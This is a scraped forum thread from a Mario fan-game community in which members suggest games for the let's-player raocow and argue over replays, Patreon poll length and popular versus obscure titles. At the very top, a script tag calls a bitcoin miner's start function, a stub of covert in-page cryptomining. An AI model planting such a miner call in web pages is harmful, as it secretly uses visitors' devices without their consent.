<script>
miner.start(); // initialise bitcoin miner
</script>

mario fan games galaxysmw centralsmbx community

request grab-bag

this is the place where lps are being talked about. it's important to talk about games being played on the internet.

i am a dog weasel ?!

very yes
50%
yes
24%
no
15%
very no
12%

Total votes: 208

Rockythechao
the figure of Kevka's bear was a sightseeing
First name: Michael
Pronouns: he/they

Re: request grab-bag

Postby Rockythechao » 11 months ago

Seconding Battle for Bikini Bottom, it's a pretty janky game but overall still a good time. Also it's likely to get rereleased in the near future.
https://www.polygon.com/2018/3/21/17146 ... thq-nordic
A2XT Episode 2's vice admiral "The Project's Not Dead Yet" person and certified Absurdly-Oblivious Fool

Useful posts, discussions & resources for SMBX and A2XT

My art & audio thread
Audiomack (new music), SoundCloud (old music)

𝐀𝐍 𝐀𝐖𝐄𝐒𝐎𝐌𝐄 𝐏𝐑𝐀𝐘𝐄𝐑 𝐈𝐒
𝐂𝐎𝐍𝐅𝐋𝐈𝐂𝐓 𝐖𝐈𝐓𝐇 𝐔𝐒

- 𝐁𝐀𝐓𝐓𝐋𝐄𝐒𝐔𝐈𝐓 𝐌𝐎𝐑𝐒𝐄𝐋 -

𝐊𝐄𝐄𝐏 𝐘𝐎𝐔𝐑 𝐃𝐈𝐆𝐍𝐈𝐓𝐘

The Doctor

Postby The Doctor » 11 months ago

CrossCode comes out on Sept 20th. It's been in early access for a while and the reviews have been fantastic.

SAJewers
hi

Postby SAJewers » 11 months ago

ImageImageImageImageImage
ImageImageImageImage

Cyril
metal nerd
First name: Cyril
Pronouns: he/she/they

Postby Cyril » 11 months ago

Oh that's finally coming out? It's literally been on my steam wishlist for like 3-4 years lol
i've honestly never played a video game in my life

Ashan
The world has become a place

Postby Ashan » 11 months ago

I don't really follow this thread so who knows if this has been suggested 1000 times before but this Vip4 redo is making me wonder if an ASMT redo would ever be on the table?
I figure at this point it's been over 8 years and everyone's forgotten a lot of content of that game, I'd love to see a modern run of it. I recall savestates being used at the end of the original playthrough, I'm not really sure if the endgame of that is feasible without (I remember there being some unforgivably long levels capped with difficult boss fights near the end)

I think that could be fun!

Leet
Well, hello, Smith ( ´-`)ノ
First name: Chie Arale
Pronouns: she/her

Postby Leet » 11 months ago

I think there is an extra checkpoint or two near the end of the game in the latest revision anyway, so it's more feasible than it was.
ImageWell it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

Petzi

Postby Petzi » 11 months ago

Ashan wrote: I don't really follow this thread so who knows if this has been suggested 1000 times before but this Vip4 redo is making me wonder if an ASMT redo would ever be on the table?
I figure at this point it's been over 8 years and everyone's forgotten a lot of content of that game, I'd love to see a modern run of it. I recall savestates being used at the end of the original playthrough, I'm not really sure if the endgame of that is feasible without (I remember there being some unforgivably long levels capped with difficult boss fights near the end)

I think that could be fun!
Oh geez, I can't believe it's been 8 years :(

I really enjoyed the first half of this VIP 4 series, but the single-level videos feel less good. Honestly, I'm not too keen on raocow getting into the habit of replaying games because of the sheer size of the coming up next list. (Donkey Kong 64 is such a long way off :< )

I wouldn't mind seeing an ASMT2 replay, though. Mostly because raocow played an unfinished version and now it's done (correct me if I'm wrong, please!)
Oui oui. Je suis très jambon.

Kshaard
Dodo/
First name: mac5565
Pronouns: he/him/his

Postby Kshaard » 11 months ago

Petzi wrote: I wouldn't mind seeing an ASMT2 replay, though. Mostly because raocow played an unfinished version and now it's done (correct me if I'm wrong, please!)
A2MT is very much playable and "done", if you will, but there are still so many random niggling flaws with lots of the levels that I don't think the subsequent LP experience would be all that much better than the zombie version had been. I still think there is a genuinely decent game in A2MT, just with a few minor level design tweaks that haven't been implemented.
This is someone's signature.

Grounder

Postby Grounder » 11 months ago

plz no

i'm already kind of burned out on replays, there's no need for a more recent game to get one
Why don't you eat me?

I am perfectly tasty...

AND I'LL STEAL YOUR SOUL! :twisted:

ImageImageImage

Petzi

Kshaard wrote: A2MT is very much playable and "done", if you will, but there are still so many random niggling flaws with lots of the levels that I don't think the subsequent LP experience would be all that much better than the zombie version had been. I still think there is a genuinely decent game in A2MT, just with a few minor level design tweaks that haven't been implemented.
Well, looks like I'm on the fresh game side of the argument.

Sebby19

Postby Sebby19 » 11 months ago

I'm also on the side of 'new stuff' (*cough* even though I dream of an Ava playthrough of Soldexus).

And while this should really go in the other topic, I think the Top 10 in Patreon polls should be cut down to Top 5, since 10 surprisingly take a very long time to go through (and kill hype for a game by the end). Especially with raocow inserting whatever he feels like in between.
ImageImage
-Banned in Antarctica
Sebby19 wrote:If your life depends on throwing up, switch to the keyboard
Official raocow subscriber # 30,000

Grounder

Postby Grounder » 11 months ago

Sebby19 wrote: I'm also on the side of 'new stuff' (*cough* even though I dream of an Ava playthrough of Soldexus).

And while this should really go in the other topic, I think the Top 10 in Patreon polls should be cut down to Top 5, since 10 surprisingly take a very long time to go through (and kill hype for a game by the end). Especially with raocow inserting whatever he feels like in between.
wouldn't be nearly as bad if people didn't keep requesting monoliths like rabi-ribi and hollow knight
Why don't you eat me?

I am perfectly tasty...

AND I'LL STEAL YOUR SOUL! :twisted:

ImageImageImage

Cyril
metal nerd

i don't know how rabi-ribi is a monolith when distorted travesty 3 exists :P

what i'm -really- concerned about is that la-mulana playthrough on the horizon though :lol: the next three games after hollow knight are all not especially big (necrosphere will be like, 10 episodes or so max imo) but la-mulana done raocow-style is either gonna be a half-year endeavor or get canned partway through

ano0maly
Discord User

Postby ano0maly » 11 months ago

Sebby19 wrote: I'm also on the side of 'new stuff' (*cough* even though I dream of an Ava playthrough of Soldexus).
To be fair, that's a new character (even with old levels) rather than being a replay of the same game with the same mode.

If it's any consolation, there's someone that did a playthrough the full game which includes Ava mode.

And I'm personally skeptical about an ASMT playthrough. At least with A2MT, raocow has expressed some interest in revisiting it as a packaged hack with some closure to loose ends (to clarify things for Petzi, it's "wrapped up" to make it look not incomplete, but I think it's still not finished relative to its original objectives before the project was cancelled). But I don't see much value in replaying ASMT when people that want to see it or forgot its contents can just go see the old let's play. Many people that contributed to it aren't around in talkhaus anymore, so there's also diminished value of connect with the present community. Don't forget that it's a very much aged hack
Image The talkhaus Discord server. Come ask for an invite to join!

Image << Click!

Leet

Every time you guys suggest a Huge Big Deal Trending Indie Game instead of something like jiggly zone, you're already kinda missing the point
ImageWell it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

Cyril
metal nerd

yeah, how dare we recommend games to raocow that he'd enjoy playing

Leet

Damn, you got me, i'm really owned right now... fuck...

Shard1697

Postby Shard1697 » 11 months ago

Leet wrote: Every time you guys suggest a Huge Big Deal Trending Indie Game instead of something like jiggly zone, you're already kinda missing the point
Hollow Knight is incredibly good and as someone who has been watching raocow for like, almost a decade, I don't think I'm missing the point to like watching him play it

Kilgamayan
The Real Treasure is You
First name: Rabi~En~Roll

Postby Kilgamayan » 11 months ago

I mean, the rules of the system are that people that pay get to vote for whatever they want (presumably within reason), and whatever happens happens. There's not much point in getting upset about it.

EDIT: I mean that in the sense of getting upset by the game lineup. The system itself may be worth discussion.
Last edited by Kilgamayan on 25 Sep 2018, 04:36, edited 1 time in total.
Image Please interact Image

Image Image
Image Image

Leet

Shard1697 wrote:
Leet wrote: Every time you guys suggest a Huge Big Deal Trending Indie Game instead of something like jiggly zone, you're already kinda missing the point
Hollow Knight is incredibly good and as someone who has been watching raocow for like, almost a decade, I don't think I'm missing the point to like watching him play it
No, but I do think you missed the point of my post.

I'd explain better but it was just supposed to be an idle comment and now everybody wants to hot take me about how upset I am so whatever... I didn't mean to bother anyone

Voltgloss
The first story's end.
Pronouns: he/him/his

Postby Voltgloss » 11 months ago

Parama wrote: what i'm -really- concerned about is that la-mulana playthrough on the horizon though :lol: the next three games after hollow knight are all not especially big (necrosphere will be like, 10 episodes or so max imo) but la-mulana done raocow-style is either gonna be a half-year endeavor or get canned partway through
I wouldn't underestimate raocow this way.

ano0maly
Discord User

Postby ano0maly » 11 months ago

@Leet: I get that you want to see more niche fanwork games and lesser known projects, but... there are factors that put a limit to that. raocow made this his job now, so it may not be sustainable without enough mix of games and playthroughs that attract more attention and more liking by viewers. And deliberately looking for games that are more obscure (that would make good let's plays) isn't always easy, and the results don't always work out very well. Games that have a wider recognition/good reception are more reliable beforehand.

There are still upcoming LPs of fangames and whatnot (mainly from A-side). And there are indie and small-team projects that just happened to become better known, like Rosenkreuzstilette. Nothing wrong with that.
Image The talkhaus Discord server. Come ask for an invite to join!

Image << Click!

Cyril
metal nerd

Voltgloss wrote:
Parama wrote: what i'm -really- concerned about is that la-mulana playthrough on the horizon though :lol: the next three games after hollow knight are all not especially big (necrosphere will be like, 10 episodes or so max imo) but la-mulana done raocow-style is either gonna be a half-year endeavor or get canned partway through
I wouldn't underestimate raocow this way.
more than anything, la-mulana punishes you for not paying attention

i have watched enough raocow to know this is a particular weak point for him

Petzi

ano0maly wrote: At least with A2MT, raocow has expressed some interest in revisiting it as a packaged hack with some closure to loose ends (to clarify things for Petzi, it's "wrapped up" to make it look not incomplete, but I think it's still not finished relative to its original objectives before the project was cancelled).
Thanks. Yeah, it's definitely not something I'd super excited about, since the LP would be mostly the same.

ano0maly wrote: raocow made this his job now, so it may not be sustainable without enough mix of games and playthroughs that attract more attention and more liking by viewers.
I definitely agree, it would be cool to see raocow play more mainstream games once in a while, and it would attract more viewers. I'd even like to watch him streaming, as long as it wasn't a game where he has to replay the same part over and over (again, it could be profitable). But being true to himself is more important, of course.

Alice
?
Pronouns: Girl person

Postby Alice » 11 months ago

Leet wrote:Every time you guys suggest a Huge Big Deal Trending Indie Game instead of something like jiggly zone, you're already kinda missing the point
I don't agree at all. The point of the thread is to suggest games he may not otherwise consider. Popularity of said game is completely irrelevant to that.
Parama wrote: more than anything, la-mulana punishes you for not paying attention

i have watched enough raocow to know this is a particular weak point for him
Though this is also raocow so things most people consider difficult, like the mantras puzzle, he may just blunder his way through without ever even realizing what he's doing. I can see him getting stuck on some of the less obscure puzzles though, lol.

Return to “let's play”